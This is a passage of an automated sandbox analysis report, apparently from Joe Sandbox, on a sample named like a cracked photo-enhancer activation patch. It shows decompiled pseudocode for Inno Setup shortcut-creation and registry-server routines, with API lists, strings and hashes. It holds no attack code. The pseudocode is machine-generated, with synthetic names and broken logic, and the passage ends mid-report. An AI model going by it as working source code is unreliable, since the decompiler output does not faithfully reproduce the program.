					_push(_t98);
					_push(0x49c774);
					_push(1);
					_push(0);
					_push(0x49ca78);
					L0042D0D4();
				}
				if(_t98 != 0) {
					_a20 = 0;
					_t210 =  &_v12;
					_push(_t210);
					_push(0x49c774);
					_push(1);
					_push(0);
					_push(0x49c764);
					L0042D0D4();
					_t254 = _t210;
					if(_t210 != 0) {
						E00453CAC("CoCreateInstance", _t215, _t210, _t244, _t246, _t254);
					}
				}
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				 *[fs:edx] = _t251;
				_t104 = _v12;
				 *((intOrPtr*)( *_t104 + 0x50))(_t104, E00403738(_t244),  *[fs:edx], 0x4571ee, _t249);
				_t109 = _v12;
				 *((intOrPtr*)( *_t109 + 0x2c))(_t109, E00403738(_a44));
				if(_a20 == 0) {
					E00456C8C(_v12, _t215, _a40, _t244, _t246);
				}
				if(_a36 != 0) {
					if( *0x49f446 != 0) {
						E0047E4A8("{pf32}\\", _t216,  &_v44);
						E0042DFA0( &_a36, "%ProgramFiles(x86)%\\", _v44, 1);
					}
					_t201 = _v12;
					 *((intOrPtr*)( *_t201 + 0x44))(_t201, E00403738(_a36), _a32);
				}
				_t113 = _v12;
				_t115 =  *((intOrPtr*)( *_t113 + 0x3c))(_t113, _a28);
				if(_t246 != 0) {
					_t196 = _v12;
					_t115 =  *((intOrPtr*)( *_t196 + 0x1c))(_t196, E00403738(_t246));
				}
				if(_a24 != 0) {
					_t192 = _v12;
					_t115 =  *((intOrPtr*)( *_t192 + 0x34))(_t192, _a24);
				}
				_t116 = E00456C6C(_t115);
				if(_t116 == 0 || (_t116 & 0xffffff00 | _t215 != 0x00000000 | _a12) == 0 && _a8 == 0) {
					L38:
					_t118 = _v12;
					__eflags =  *((intOrPtr*)( *_t118))(_t118, 0x49c744,  &_v20);
					if(__eflags != 0) {
						_t120 = E00453CAC("IShellLink::QueryInterface(IID_IPersistFile)", _t215, _t120, _t244, _t246, __eflags);
					}
					__eflags = _a20;
					if(_a20 == 0) {
						L43:
						_v24 = E00403CA4(_v8);
					} else {
						__eflags = E00456C4C(_t120);
						if(__eflags == 0) {
							goto L43;
						} else {
							E0042C988(_v8, _t215,  &_v44, 0, _t244, _t246, __eflags);
							_v24 = E00403CA4(_v44);
						}
					}
					__eflags = _v24;
					if(_v24 == 0) {
						E00409090();
					}
					_t124 = _v20;
					__eflags =  *((intOrPtr*)( *_t124 + 0x18))(_t124, _v24, 1);
					if(__eflags != 0) {
						E00453CAC("IPersistFile::Save", _t215, _t126, _t244, _t246, __eflags);
					}
					E00456D80(_v20, _t215, _a4, _v8, _t244, _t246, __eflags);
					_pop(_t227);
					 *[fs:eax] = _t227;
					_push(0x4571f5);
					__eflags = _v24;
					if(_v24 != 0) {
						_push(_v24);
						L0042D0EC();
					}
					__eflags = _v16;
					if(_v16 != 0) {
						_t136 = _v16;
						 *((intOrPtr*)( *_t136 + 8))(_t136);
					}
					__eflags = _v20;
					if(_v20 != 0) {
						_t133 = _v20;
						 *((intOrPtr*)( *_t133 + 8))(_t133);
					}
					_t130 = _v12;
					return  *((intOrPtr*)( *_t130 + 8))(_t130);
				} else {
					_t152 = _v12;
					_t154 =  *((intOrPtr*)( *_t152))(_t152, 0x49ca68,  &_v16);
					_t264 = _t154;
					if(_t154 != 0) {
						E00453CAC("IShellLink::QueryInterface(IID_IPropertyStore)", _t215, _t154, _t244, _t246, _t264);
					}
					if(_a8 != 0) {
						_v40 = 0xb;
						_v32 = 0xffff;
						_t184 = _v16;
						_t186 =  *((intOrPtr*)( *_t184 + 0x18))(_t184, 0x49cab0,  &_v40);
						_t266 = _t186;
						if(_t186 != 0) {
							E00453CAC("IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)", _t215, _t186, _t244, _t246, _t266);
						}
					}
					if(_t215 == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							_v40 = 0xb;
							_v32 = 0xffff;
							_t161 = _v16;
							__eflags =  *((intOrPtr*)( *_t161 + 0x18))(_t161, 0x49ca9c,  &_v40);
							if(__eflags != 0) {
								_t163 = E00453CAC("IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)", _t215, _t163, _t244, _t246, __eflags);
							}
							_t164 = E00456C7C(_t163);
							__eflags = _t164;
							if(_t164 != 0) {
								_v40 = 0x13;
								_v32 = 1;
								_t166 = _v16;
								__eflags =  *((intOrPtr*)( *_t166 + 0x18))(_t166, 0x49cac4,  &_v40);
								if(__eflags != 0) {
									E00453CAC("IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)", _t215, _t168, _t244, _t246, __eflags);
								}
							}
						}
						_t155 = _v16;
						__eflags =  *((intOrPtr*)( *_t155 + 0x1c))(_t155);
						if(__eflags != 0) {
							E00453CAC("IPropertyStore::Commit", _t215, _t157, _t244, _t246, __eflags);
						}
						goto L38;
					} else {
						_v40 = 8;
						_t247 = E00403CA4(_t215);
						_v32 = _t247;
						if(_t247 == 0) {
							E00409090();
						}
						 *[fs:edx] = _t251;
						_t175 = _v16;
						_t177 =  *((intOrPtr*)( *_t175 + 0x18))(_t175, 0x49ca88,  &_v40,  *[fs:edx], 0x457091, _t249);
						_t269 = _t177;
						if(_t177 != 0) {
							E00453CAC("IPropertyStore::SetValue(PKEY_AppUserModel_ID)", _t215, _t177, _t244, _t247, _t269);
						}
						_pop(_t235);
						 *[fs:eax] = _t235;
						_push(0x457098);
						_t179 = _v32;
						_push(_t179);
						L0042D0EC();
						return _t179;
					}
				}
			}

0x00456e68
0x00456e69
0x00456e6b
0x00456e6e
0x00456e6f
0x00456e70
0x00456e73
0x00456e76
0x00456e78
0x00456e7a
0x00456e7d
0x00456e83
0x00456e8a
0x00456e8b
0x00456e90
0x00456e93
0x00456e9a
0x00456eb5
0x00456e9c
0x00456e9c
0x00456e9f
0x00456ea0
0x00456ea5
0x00456ea7
0x00456ea9
0x00456eae
0x00456eae
0x00456ebc
0x00456ebe
0x00456ec2
0x00456ec5
0x00456ec6
0x00456ecb
0x00456ecd
0x00456ecf
0x00456ed4
0x00456ed9
0x00456edb
0x00456ee4
0x00456ee4
0x00456edb
0x00456eeb
0x00456ef0
0x00456ef5
0x00456f03
0x00456f0e
0x00456f14
0x00456f20
0x00456f26
0x00456f2d
0x00456f35
0x00456f35
0x00456f3e
0x00456f47
0x00456f53
0x00456f63
0x00456f63
0x00456f75
0x00456f7b
0x00456f7b
0x00456f82
0x00456f88
0x00456f8d
0x00456f97
0x00456f9d
0x00456f9d
0x00456fa5
0x00456fac
0x00456fb2
0x00456fb2
0x00456fb5
0x00456fbc
0x0045711d
0x00457126
0x0045712e
0x00457130
0x00457139
0x00457139
0x0045713e
0x00457142
0x00457167
0x0045716f
0x00457144
0x00457149
0x0045714b
0x00000000
0x0045714d
0x00457155
0x00457162
0x00457162
0x0045714b
0x00457172
0x00457176
0x00457178
0x00457178
0x00457183
0x0045718c
0x0045718e
0x00457197
0x00457197
0x004571a5
0x004571ac
0x004571af
0x004571b2
0x004571b7
0x004571bb
0x004571c0
0x004571c1
0x004571c1
0x004571c6
0x004571ca
0x004571cc
0x004571d2
0x004571d2
0x004571d5
0x004571d9
0x004571db
0x004571e1
0x004571e1
0x004571e4
0x004571ed
0x00456fd6
0x00456fdf
0x00456fe5
0x00456fe7
0x00456fe9
0x00456ff2
0x00456ff2
0x00456ffb
0x00456ffd
0x00457003
0x00457012
0x00457018
0x0045701b
0x0045701d
0x00457026
0x00457026
0x0045701d
0x0045702d
0x00457098
0x0045709c
0x0045709e
0x004570a4
0x004570b3
0x004570bc
0x004570be
0x004570c7
0x004570c7
0x004570cc
0x004570d1
0x004570d3
0x004570d5
0x004570db
0x004570eb
0x004570f4
0x004570f6
0x004570ff
0x004570ff
0x004570f6
0x004570d3
0x00457104
0x0045710d
0x0045710f
0x00457118
0x00457118
0x00000000
0x0045702f
0x0045702f
0x0045703c
0x0045703e
0x00457043
0x00457045
0x00457045
0x00457055
0x00457061
0x00457067
0x0045706a
0x0045706c
0x00457075
0x00457075
0x0045707c
0x0045707f
0x00457082
0x00457087
0x0045708a
0x0045708b
0x00457090
0x00457090
0x0045702d

APIs

770EB690.OLE32(0049CA78,00000000,00000001,0049C774,?,00000000,00457213), ref: 00456EAE
770EB690.OLE32(0049C764,00000000,00000001,0049C774,?,00000000,00457213), ref: 00456ED4
SysFreeString.OLEAUT32(00000000), ref: 0045708B

Strings

%ProgramFiles(x86)%\, xrefs: 00456F5E
IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 00456FED
CoCreateInstance, xrefs: 00456EDF
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 00457021
IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00457134
IPropertyStore::Commit, xrefs: 00457113
IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00457070
IPersistFile::Save, xrefs: 00457192
{pf32}\, xrefs: 00456F4E
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 004570C2
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004570FA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: B690$FreeString
String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
API String ID: 1621011594-2363233914
Opcode ID: 1a04e3ad86ed443edbec985671ef4627b21a6ac01ec9052fef93741c1d993dd6
Instruction ID: 2e1e526739867e50670bceb89507c71339c1b21d6ee211b494412a744f46fea4
Opcode Fuzzy Hash: 1a04e3ad86ed443edbec985671ef4627b21a6ac01ec9052fef93741c1d993dd6
Instruction Fuzzy Hash: 3DB13C71A04104AFDB10DFA9D885B9E7BF8AF09306F1440A6F804E7362DB38DD49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004744A8 Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004744A8(char __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v41;
				char _v42;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _t281;
				signed char _t301;
				void* _t306;
				intOrPtr _t340;
				intOrPtr _t356;
				intOrPtr _t360;
				intOrPtr _t362;
				void* _t364;
				void* _t365;
				intOrPtr _t366;
				void* _t367;
				void* _t384;

				_t384 = __fp0;
				_t367 = __eflags;
				_t364 = _t365;
				_t366 = _t365 + 0xffffffc8;
				_v48 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_t362 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t360 = _a40;
				E00403728(_v8);
				_push(_t364);
				_push(0x4748f8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t366;
				E00403778(_v8, 8, 1,  &_v48);
				E00403684(_v48, "{group}\\");
				_v13 = _t367 == 0;
				E0047E4A8(_v8, 8,  &_v48);
				E00403494( &_v8, _v48);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x474924);
				E0042CC94(_v48,  &_v20);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x474934);
				E0042CC94(_v48,  &_v24);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x474944);
				E0042CC94(_v48,  &_v28);
				E0042CC94(_v8,  &_v32);
				_t301 =  *0x47494c; // 0x8
				if(_a28 == 0) {
					__eflags = _v13;
					if(__eflags != 0) {
						__eflags = _t301;
					}
				} else {
					_t301 = _t301 | 0x00000001;
				}
				if(_a16 != 0) {
					E0047AF78(6, 1);
					if(6 != 0) {
						_a16 = 0;
					}
				}
				_v41 = E00474178(_t362, 6);
				_t371 = _v41;
				if(_v41 == 0) {
					E00403494( &_v36, _v20);
				} else {
					E00403494( &_v36, _v28);
				}
				_v56 = _v36;
				_v52 = 0xb;
				E004587AC("Dest filename: %s", _t301, 0,  &_v56, _t360, _t362);
				E0046F82C(_v36, _t301, 1, _t360, _t362, _t371);
				E0042CD34(_v36, 0,  &_v48);
				E00471340(0, _t301, _t301, _v48, _t360, _t362, _t371,  *((intOrPtr*)(_a52 + 8)));
				_pop(_t306);
				E004073E0(_v20);
				E004073E0(_v24);
				if(E0042D1B4(_v28) != 0) {
					WritePrivateProfileStringA(0, 0, 0, E00403738(_v28));
				}
				E004073E0(_v28);
				E00474358(_v32, _t301, _t360, _t362);
				E004585A0("Creating the icon.", _t301, _t306, _t360, _t362);
				if(_v41 != 0) {
					_t307 = _t360;
					E00474214(_v28, _t301, _t360, _t362, _t360, _t362, _a36);
					E00403494( &_v40, _v28);
					_v42 = 0;
				} else {
					_t307 = _t362;
					E00456E68(_v20, _t301, _t362, _v12, _t360, _t362,  &_v40, _a4, _a8, _a12, _a16, _a20, _a32, _a36, _t360, _a44, _a48);
					_t374 = _a16;
					if(_a16 == 0 || E0042D1D8(_t374) == 0) {
						_t281 = 0;
					} else {
						_t281 = 1;
					}
					_v42 = _t281;
					if(_a24 != 0) {
						_t377 = _v42;
						if(_v42 == 0) {
							E0042CD8C(_v40, _t307,  &_v48, _t377);
							if(E00406F54(_v48, 0x474934) == 0) {
								_push(_t364);
								_push( *[fs:eax]);
								 *[fs:eax] = _t366;
								E00455CD8(_v40, _t301, 0x474900 | _a24 == 0x00000001);
								_pop(_t356);
								_t307 = 0x47472a;
								 *[fs:eax] = _t356;
							}
						}
					}
				}
				E004585A0("Successfully created the icon.", _t301, _t307, _t360, _t362);
				 *0x49f48c = 1;
				if(_v42 == 0) {
					SHChangeNotify(2, 1, E00403738(_v40), 0);
				} else {
					SHChangeNotify(8, 1, E00403738(_v40), 0);
				}
				E0042CD34(_v40, _t307,  &_v48);
				SHChangeNotify(0x1000, 0x1001, E00403738(_v48), 0);
				if(_a28 == 0) {
					if(_v42 == 0) {
						__eflags = _v41;
						if(_v41 == 0) {
							_v60 = _v20;
							E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x82, _t360, _t362, 0x20, 0);
							_v60 = _v24;
							E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x82, _t360, _t362, 0x20, 0);
						} else {
							_v60 = _v40;
							E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x82, _t360, _t362, 0x20, 0);
						}
					} else {
						_v60 = _v40;
						E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x81, _t360, _t362, 0x12, 0);
						E0042C88C(_v40,  &_v48);
						E0040357C( &_v48, "target.lnk");
						_v60 = _v48;
						E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x82, _t360, _t362, 0, 0);
						E0042C88C(_v40,  &_v48);
						E0040357C( &_v48, "Desktop.ini");
						_v60 = _v48;
						E0045AA94( *((intOrPtr*)( *((intOrPtr*)(_a52 + 8)) - 4)), _t301,  &_v60, 0x82, _t360, _t362, 0, 0);
					}
				}
				E0046FC04(0x3e8, _t384);
				_pop(_t340);
				 *[fs:eax] = _t340;
				_push(0x4748ff);
				E00403400( &_v48);
				E00403420( &_v40, 6);
				return E00403400( &_v8);
			}

0x004744a8
0x004744a8
0x004744a9
0x004744ab
0x004744b3
0x004744b6
0x004744b9
0x004744bc
0x004744bf
0x004744c2
0x004744c5
0x004744c8
0x004744ca
0x004744cd
0x004744d0
0x004744d6
0x004744dd
0x004744de
0x004744e3
0x004744e6
0x004744fa
0x00474507
0x0047450c
0x00474516
0x00474521
0x0047452c
0x00474539
0x00474544
0x0047454f
0x0047455c
0x00474567
0x00474572
0x0047457f
0x0047458a
0x00474595
0x0047459a
0x004745a4
0x004745ab
0x004745af
0x004745b1
0x004745b1
0x004745a6
0x004745a6
0x004745a6
0x004745b8
0x004745be
0x004745c5
0x004745c7
0x004745c7
0x004745c5
0x004745d2
0x004745d5
0x004745d9
0x004745ee
0x004745db
0x004745e1
0x004745e1
0x004745f6
0x004745f9
0x00474607
0x00474611
0x00474623
0x0047462f
0x00474634
0x00474638
0x00474640
0x0047464f
0x00474660
0x00474660
0x00474668
0x00474670
0x0047467a
0x00474683
0x0047473a
0x00474741
0x0047474c
0x00474751
0x00474689
0x004746b3
0x004746bb
0x004746c0
0x004746c4
0x004746d2
0x004746d6
0x004746d6
0x004746d6
0x004746d8
0x004746df
0x004746e1
0x004746e5
0x004746ed
0x00474701
0x00474705
0x0047470b
0x0047470e
0x0047471b
0x00474722
0x00474724
0x00474725
0x00474725
0x00474701
0x004746e5
0x004746df
0x0047475a
0x0047475f
0x0047476a
0x00474791
0x0047476c
0x0047477b
0x0047477b
0x0047479e
0x004747b6
0x004747bf
0x004747c9
0x0047485e
0x00474862
0x0047488c
0x0047489f
0x004748ab
0x004748be
0x00474864
0x0047486b
0x0047487e
0x0047487e
0x004747cf
0x004747d6
0x004747e9
0x004747f8
0x00474805
0x0047480d
0x00474820
0x0047482f
0x0047483c
0x00474844
0x00474857
0x00474857
0x004747c9
0x004748c8
0x004748cf
0x004748d2
0x004748d5
0x004748dd
0x004748ea
0x004748f7

APIs

Part of subcall function 0042CC94: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042CCB8

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00474660
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0047477B
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00474791
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004747B6

Strings

.url, xrefs: 0047457A
Desktop.ini, xrefs: 00474837
Dest filename: %s, xrefs: 00474602
.lnk, xrefs: 00474534
.pif, xrefs: 00474557, 004746F5
Creating the icon., xrefs: 00474675
{group}\, xrefs: 00474502
target.lnk, xrefs: 00474800
Successfully created the icon., xrefs: 00474755

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
String ID: .lnk$.pif$.url$Creating the icon.$Desktop.ini$Dest filename: %s$Successfully created the icon.$target.lnk${group}\
API String ID: 971782779-2902529204
Opcode ID: dfedba3bd349ab3b5efeede3455e74f7497f55b16e4a34f5eada44c138dbca6e
Instruction ID: 3ad2e39f7b63c2e1f507bff71cd9103ce15de2bb976d6045025a0d2193d98ff2
Opcode Fuzzy Hash: dfedba3bd349ab3b5efeede3455e74f7497f55b16e4a34f5eada44c138dbca6e
Instruction Fuzzy Hash: A4D14574A00149AFDB01EFA9D581BEEBBF4AF48304F50806AF904B7391D7789D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0049B254 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0049B254(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v6;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v44;
				char _t63;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t125;
				char _t126;
				char _t130;
				char _t135;
				char _t138;
				long _t151;
				int _t155;
				intOrPtr _t177;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr _t193;
				intOrPtr _t199;
				intOrPtr _t200;

				_t197 = __esi;
				_t196 = __edi;
				_t199 = _t200;
				_t155 = 5;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
				} while (_t155 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t199);
				_push(0x49b5ec);
				_push( *[fs:eax]);
				 *[fs:eax] = _t200;
				E0042D8DC(1, 0x49e62c,  &_v36, __edi, __esi);
				if(E00406F54(_v36, 0x49b604) != 0) {
					E0042D8DC(1, 0x49e62c,  &_v36, __edi, __esi);
					_t63 = E00406F54(_v36, 0x49b614);
					__eflags = _t63;
					if(_t63 != 0) {
						__eflags = 0;
						_pop(_t177);
						 *[fs:eax] = _t177;
						_push(E0049B5F3);
						return E00403420( &_v44, 7);
					} else {
						_v5 = 0;
						goto L6;
					}
				} else {
					_v5 = 1;
					L6:
					E00424754( *0x49e62c, 0x49b624, _t196);
					ShowWindow( *( *0x49e62c + 0x20), 5);
					E00481550();
					_v12 = CreateMutexA(0, 0, "Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *0x49e62c + 0x20), 0);
					if(_v12 != 0) {
						do {
							E0042493C( *0x49e62c);
							_t151 = MsgWaitForMultipleObjects(1,  &_v12, 0, 0xffffffff, 0xff);
							_t204 = _t151 == 1;
						} while (_t151 == 1);
					}
					ShowWindow( *( *0x49e62c + 0x20), 5);
					_push(_t199);
					_push(0x49b5ca);
					_push( *[fs:eax]);
					 *[fs:eax] = _t200;
					E0042D8DC(0, 0x49e62c,  &_v36, _t196, _t197);
					E0042C988(_v36, 0x49e62c,  &_v20, 0x49b64c, _t196, _t197, _t204);
					E0042D8DC(0, 0x49e62c,  &_v36, _t196, _t197);
					E0042C988(_v36, 0x49e62c,  &_v24, 0x49b65c, _t196, _t197, _t204);
					if(E0042D1B4(_v24) == 0) {
						E004073E0(_v24);
						E004073E0(_v20);
						_push(_t199);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						E0049B1B0(0x49e62c,  &_v24, _t196, _t197, __eflags);
						_pop(_t184);
						 *[fs:eax] = _t184;
						_t185 = 0x49b59a;
						 *[fs:eax] = _t185;
						_push(E0049B5D1);
						__eflags = _v12;
						if(_v12 != 0) {
							ReleaseMutex(_v12);
							return CloseHandle(_v12);
						}
						return 0;
					} else {
						E0042F5EC(E00451D88(_v20, 0x49e62c, 1, 0, _t196, _t197) & 0xffffff00 | ( *0x49eff4 & 0x00000001) != 0x00000000);
						_t187 =  *0x49eec8; // 0x230dd30
						E00424754( *0x49e62c, _t187, _t196);
						_push(_t199);
						_push(0x49b566);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						E0047EDD0(0x49e62c, _t187, _t196, _t197);
						_v16 = E00450F04(1, 1, 0, 2);
						_push(_t199);
						_push(0x49b54c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						while(E00451198(_v16) == 0) {
							E004511A8(_v16,  &_v28);
							_t119 = E00403574(_v28);
							__eflags = _t119 - 4;
							if(_t119 > 4) {
								__eflags =  *_v28 - 0x5b;
								if( *_v28 == 0x5b) {
									_t121 = _v28;
									__eflags =  *((char*)(_t121 + 3)) - 0x5d;
									if( *((char*)(_t121 + 3)) == 0x5d) {
										E00403778(_v28, 0x7fffffff, 5,  &_v32);
										_t125 = _v28;
										__eflags =  *((char*)(_t125 + 2)) - 0x71;
										if( *((char*)(_t125 + 2)) == 0x71) {
											L17:
											_t126 = 1;
										} else {
											__eflags = _v5;
											if(_v5 == 0) {
												L16:
												_t126 = 0;
											} else {
												__eflags =  *0x49f448;
												if( *0x49f448 == 0) {
													goto L17;
												} else {
													goto L16;
												}
											}
										}
										_v6 = _t126;
										_push(_t199);
										_push(0x49b4bc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t200;
										_t130 =  *((intOrPtr*)(_v28 + 1)) - 0x53;
										__eflags = _t130;
										if(_t130 == 0) {
											_push(_v6);
											E00458BB0(0, 0x49e62c, _v32, 1, _t196, _t197);
										} else {
											_t135 = _t130 - 1;
											__eflags = _t135;
											if(_t135 == 0) {
												__eflags = 0;
												E00458D24(0, 0x49e62c, _v32, _t196, _t197, 0);
											} else {
												_t138 = _t135 - 0x1f;
												__eflags = _t138;
												if(_t138 == 0) {
													_push(_v6);
													E00458BB0(0, 0x49e62c, _v32, 0, _t196, _t197);
												} else {
													__eflags = _t138 == 1;
													if(_t138 == 1) {
														E0045742C(_v32, 0x49e62c, _t196, _t197);
													}
												}
											}
										}
										_pop(_t193);
										 *[fs:eax] = _t193;
									}
								}
							}
						}
						_pop(_t190);
						 *[fs:eax] = _t190;
						_push(E0049B553);
						return E00402B58(_v16);
					}
				}
			}

0x0049b254
0x0049b254
0x0049b255
0x0049b257
0x0049b25c
0x0049b25c
0x0049b25e
0x0049b260
0x0049b260
0x0049b263
0x0049b264
0x0049b265
0x0049b26d
0x0049b26e
0x0049b273
0x0049b276
0x0049b281
0x0049b295
0x0049b2a5
0x0049b2b2
0x0049b2b7
0x0049b2b9
0x0049b5d1
0x0049b5d3
0x0049b5d6
0x0049b5d9
0x0049b5eb
0x0049b2bf
0x0049b2bf
0x00000000
0x0049b2bf
0x0049b297
0x0049b297
0x0049b2c3
0x0049b2ca
0x0049b2d7
0x0049b2dc
0x0049b2ef
0x0049b2fa
0x0049b303
0x0049b305
0x0049b307
0x0049b31b
0x0049b320
0x0049b320
0x0049b305
0x0049b32b
0x0049b332
0x0049b333
0x0049b338
0x0049b33b
0x0049b343
0x0049b353
0x0049b35d
0x0049b36d
0x0049b37c
0x0049b570
0x0049b578
0x0049b57f
0x0049b585
0x0049b588
0x0049b58b
0x0049b592
0x0049b595
0x0049b5a6
0x0049b5a9
0x0049b5ac
0x0049b5b1
0x0049b5b5
0x0049b5bb
0x00000000
0x0049b5c4
0x0049b5c9
0x0049b382
0x0049b398
0x0049b39d
0x0049b3a5
0x0049b3ac
0x0049b3ad
0x0049b3b2
0x0049b3b5
0x0049b3b8
0x0049b3d2
0x0049b3d7
0x0049b3d8
0x0049b3dd
0x0049b3e0
0x0049b526
0x0049b3ee
0x0049b3f6
0x0049b3fb
0x0049b3fe
0x0049b407
0x0049b40a
0x0049b410
0x0049b413
0x0049b417
0x0049b42e
0x0049b433
0x0049b436
0x0049b43a
0x0049b44f
0x0049b44f
0x0049b43c
0x0049b43c
0x0049b440
0x0049b44b
0x0049b44b
0x0049b442
0x0049b442
0x0049b449
0x00000000
0x00000000
0x00000000
0x00000000
0x0049b449
0x0049b440
0x0049b451
0x0049b456
0x0049b457
0x0049b45c
0x0049b45f
0x0049b468
0x0049b468
0x0049b46a
0x0049b48f
0x0049b497
0x0049b46c
0x0049b46c
0x0049b46c
0x0049b46e
0x0049b4ab
0x0049b4ad
0x0049b470
0x0049b470
0x0049b470
0x0049b472
0x0049b47d
0x0049b485
0x0049b474
0x0049b474
0x0049b476
0x0049b4a1
0x0049b4a1
0x0049b476
0x0049b472
0x0049b46e
0x0049b4b4
0x0049b4b7
0x0049b4b7
0x0049b417
0x0049b40a
0x0049b3fe
0x0049b538
0x0049b53b
0x0049b53e
0x0049b54b
0x0049b54b
0x0049b37c

APIs

ShowWindow.USER32(?,00000005,00000000,0049B5EC,?,?,00000000,?,00000000,00000000,?,0049B9A3,00000000,0049B9AD,?,00000000), ref: 0049B2D7
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0049B5EC,?,?,00000000,?,00000000,00000000,?,0049B9A3,00000000), ref: 0049B2EA
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0049B5EC,?,?,00000000,?,00000000,00000000), ref: 0049B2FA
MsgWaitForMultipleObjects.USER32 ref: 0049B31B
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0049B5EC,?,?,00000000,?,00000000), ref: 0049B32B

Part of subcall function 0042D8DC: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D96A,?,?,?,00000001,?,004568AE,00000000,00456916), ref: 0042D911

Strings

